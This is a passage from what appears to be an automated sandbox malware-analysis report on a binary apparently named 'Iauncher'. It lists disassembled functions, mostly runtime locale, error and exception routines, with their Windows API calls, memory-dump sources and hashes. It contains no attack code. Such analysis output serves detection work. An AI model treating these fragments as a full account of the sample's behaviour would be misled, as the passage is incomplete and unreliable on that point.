                                                                                                                                                    • Opcode Fuzzy Hash: 5d723c5fe6f29d7ccd8f30df69bf1545deea9131acc1537fa6f80d00c9516ee0
                                                                                                                                                    • Instruction Fuzzy Hash: 4C31E574901219DBCB21DF64DD89B8DBBB8BF18310F5041DAE81CA7250EB709F858F45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00575D19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0057232C,?,20001004,00000000,00000002,?,?,0057192E), ref: 00575D4D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 2299586839-4155469514
                                                                                                                                                    • Opcode ID: 068e087007f3c5e3ed925e6048bf55eaa548150617d373ec6391f98cc2f4e2b7
                                                                                                                                                    • Instruction ID: 85cc21ce301904e7d2c555033ea1da52a0a4d1991acdadadfd8f464cd2ef2c49
                                                                                                                                                    • Opcode Fuzzy Hash: 068e087007f3c5e3ed925e6048bf55eaa548150617d373ec6391f98cc2f4e2b7
                                                                                                                                                    • Instruction Fuzzy Hash: 64E01A3190051EFBCB222F61EC09A9E7E59BF44760F008410FD096A121DBB28A21BB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0056687C Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00566892
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                    • Opcode ID: 2b69fa81a0c7f66ef0ed10ec54c3310be696c1c8075397189169cc501cc54fae
                                                                                                                                                    • Instruction ID: f2392574b0a73ff002f3564f5720f60a718fc33f96cd2ab093c42c7ba31f88b5
                                                                                                                                                    • Opcode Fuzzy Hash: 2b69fa81a0c7f66ef0ed10ec54c3310be696c1c8075397189169cc501cc54fae
                                                                                                                                                    • Instruction Fuzzy Hash: CB516EB5A01605CFEB14CFA5DE867AABBF0FB58310F249A2AD806FB250D3749944CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057960E Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9c6298528acc933368cf2696c7689d3e043873af8187f28fa81416800618a55f
                                                                                                                                                    • Instruction ID: bca909097aee6ed6b8d12ed724230b2455a3124ac73534f3efb8c7e7b45bd9fe
                                                                                                                                                    • Opcode Fuzzy Hash: 9c6298528acc933368cf2696c7689d3e043873af8187f28fa81416800618a55f
                                                                                                                                                    • Instruction Fuzzy Hash: C141C675804219AEDF10DF69DC89AEABBB8FF45304F1482D9E40CD3201DA309E849F60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057C828 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0057C87C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                    • Opcode ID: 72b47690ac47f0c615679bfba19f289179beced699958c450bd8e0c748fe4a78
                                                                                                                                                    • Instruction ID: bdbfbd9284b9c8a5da2b1b156c74ef89a8b3ea5bb29daf95a399434e55b94556
                                                                                                                                                    • Opcode Fuzzy Hash: 72b47690ac47f0c615679bfba19f289179beced699958c450bd8e0c748fe4a78
                                                                                                                                                    • Instruction Fuzzy Hash: 4821B372610207ABDB28AA29EC46B7A3FA8FF45314B10807EFD09D6141EB75ED04AB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057C4AF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0057C5D5,00000001,00000000,?,-00000050,?,0057CC06,00000000,?,?,?,00000055,?), ref: 0057C521
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: f42be8ceef2a727bc2ac0d56e11a75489de5c2e137ea25512d801583169e2b2d
                                                                                                                                                    • Instruction ID: 5372ab725dee6ca8230e708a59a02b65ad6ddae5d6c1620339992f8bb3de777c
                                                                                                                                                    • Opcode Fuzzy Hash: f42be8ceef2a727bc2ac0d56e11a75489de5c2e137ea25512d801583169e2b2d
                                                                                                                                                    • Instruction Fuzzy Hash: AB114C3B2007015FDF189F39D8A567ABF92FF84368B15842DE94A87740E772B942E740
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057CA57 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0057C7F1,00000000,00000000,?), ref: 0057CA83
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                    • Opcode ID: 81d07019da6091c94af48a63f80765b8406a87b5e9021e7f18c8aa4391156c57
                                                                                                                                                    • Instruction ID: 2c2869037a13b555310fa901d0cc0cb332e77b9b19f6d551b42eff2e076876af
                                                                                                                                                    • Opcode Fuzzy Hash: 81d07019da6091c94af48a63f80765b8406a87b5e9021e7f18c8aa4391156c57
                                                                                                                                                    • Instruction Fuzzy Hash: B1F0F93660011BAFDB24DA21DC09BBA7F54FB40355F08C42DED0AA3140DA74FE41E6D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057C54A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0057C828,00000001,?,?,-00000050,?,0057CBCA,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0057C594
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: 92fdf5cca61602885590bd2e30b25bae7f4f4958cb1013ce86fbca4b84421a89
                                                                                                                                                    • Instruction ID: 9d1fbf954766f4a6f86d7e5b035e370bad8d1ec18bed8ca151a39b76fddc8bfc
                                                                                                                                                    • Opcode Fuzzy Hash: 92fdf5cca61602885590bd2e30b25bae7f4f4958cb1013ce86fbca4b84421a89
                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0C2362003055FDB14AF35A885A7A7F91FF80768B05842CF90A8B680C672AD41EB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005757F3 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0056D9E4: EnterCriticalSection.KERNEL32(?,?,00572DB8,?,0058D418,00000008,00572F7C,?,?,?), ref: 0056D9F3
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(005757E6,00000001,0058D4D8,0000000C,00575C15,00000000), ref: 0057582B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                    • Opcode ID: f2ba3d667ce9ab3bca0dcd2f83cefca7d628963b2c844201a06cebcb032490a2
                                                                                                                                                    • Instruction ID: 6afeff4df4a86502221ccb2d7f4592d387deb8702fc4a6b9c12dc56f5b035a99
                                                                                                                                                    • Opcode Fuzzy Hash: f2ba3d667ce9ab3bca0dcd2f83cefca7d628963b2c844201a06cebcb032490a2
                                                                                                                                                    • Instruction Fuzzy Hash: 32F03C72A54205DFD700EF98E846B597BF0FB48724F10852AE814AB2A0DBB55908DF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057C464 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0057C3BD,00000001,?,?,?,0057CC28,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0057C49B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: 7edb0e207c03800951fb08cbd9c05101c7f90be79477ea0ff755cdca1fec25f0
                                                                                                                                                    • Instruction ID: e4531bde26c40b538910c803cffc8cee51cbf3916ca2e21890362e284426a05e
                                                                                                                                                    • Opcode Fuzzy Hash: 7edb0e207c03800951fb08cbd9c05101c7f90be79477ea0ff755cdca1fec25f0
                                                                                                                                                    • Instruction Fuzzy Hash: E5F0E53A30020557CF04AF35E859B7A7F95FFC1761B06805DEE0E8B250C6769946E790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00566EFB Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00006F07,00566457), ref: 00566F00
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: 753a567ffa044d17f2da0f607f4a6930c133e0706efa7dbe48a3fd88a7cb4e81
                                                                                                                                                    • Instruction ID: 32efa583d39b9aace6f665e7e0b15781f81c3f61e4c54e05134ecec805f1cd1c
                                                                                                                                                    • Opcode Fuzzy Hash: 753a567ffa044d17f2da0f607f4a6930c133e0706efa7dbe48a3fd88a7cb4e81
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057CD88 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                    • Opcode ID: f0ef559ca1cc485a2036a1f3e7d4e17ee5cd407f287895692aa3a68ad72fb163
                                                                                                                                                    • Instruction ID: 20be810ecd7c1aa230dbc6ed0c4cf59a57eba29a7f66ad7333743407fca9dcda
                                                                                                                                                    • Opcode Fuzzy Hash: f0ef559ca1cc485a2036a1f3e7d4e17ee5cd407f287895692aa3a68ad72fb163
                                                                                                                                                    • Instruction Fuzzy Hash: 55A011302022028BC3008F30AB0820C3AE8AA2E2823002028AC08E0022EA3080A8AB00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005699E8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00569B07
                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00569C15
                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00569D67
                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00569D82
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                    • API String ID: 2751267872-393685449
                                                                                                                                                    • Opcode ID: f343dae1b7556bcf89fc156e157fec80a2fc9f25ce05b3827c1e43ffef68e9e2
                                                                                                                                                    • Instruction ID: 30890b52ec2d58f718d0f380d99175ff65706d1ac385b42e4df3eb3f1d44e16d
                                                                                                                                                    • Opcode Fuzzy Hash: f343dae1b7556bcf89fc156e157fec80a2fc9f25ce05b3827c1e43ffef68e9e2
                                                                                                                                                    • Instruction Fuzzy Hash: 62B1667180020AEFCF29DFA4D9859AEBFB9FF94310F14416AE8056B212D735DE51CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00569480 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
